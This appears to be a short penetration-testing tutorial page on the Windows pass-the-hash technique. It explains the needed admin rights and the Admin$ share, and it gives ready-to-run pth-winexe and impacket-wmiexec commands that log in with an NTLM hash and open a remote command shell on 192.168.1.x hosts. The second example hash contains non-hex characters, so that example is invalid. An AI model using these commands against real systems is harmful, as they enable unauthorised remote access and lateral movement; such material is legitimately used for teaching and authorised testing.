Pass the Hash

Pass the hash technique enables a user to authenticate to another machine or service using a user's NTLM hash instead of the password. Most pth tools create and start a Windows service such as a command or powershell prompt.

This technique requires access to the special admin share called Admin$, which in turn requires local administrative rights on the target machine.

The following command can be used to connect to a system using the NTLM hash,

pth-winexe -U John%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //192.168.1.19 cmd

In the above command if the user belongs to a domain, then the username has to be preceded with the domain name as - "p42/John"

The string β€œaad3b435b51404eeaad3b435b51404ee” is the LM hash for β€˜no password’.

The same attack can be performed using Impacket,

/usr/bin/impacket-wmiexec -hashes :08KDA34CDZ85D7A80E2EA3B9F05C415D Administrator@192.168.1.63

Last updated